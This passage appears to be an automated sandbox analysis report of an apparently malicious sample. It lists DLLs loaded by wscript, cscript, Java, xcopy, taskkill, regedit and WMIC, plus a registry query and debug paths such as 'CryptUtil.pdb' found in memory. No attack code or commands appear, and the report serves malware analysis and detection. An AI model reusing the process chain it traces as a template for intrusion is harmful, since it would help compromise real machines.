        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: opengl32.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: glu32.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: authz.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: aclui.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: clb.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: ntdsapi.dll
        Source: C:\Windows\SysWOW64\regedit.exeSection loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699563884.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdbi source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdb source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjfr\jfr.pdb source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb.. source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb** source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdbjj source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
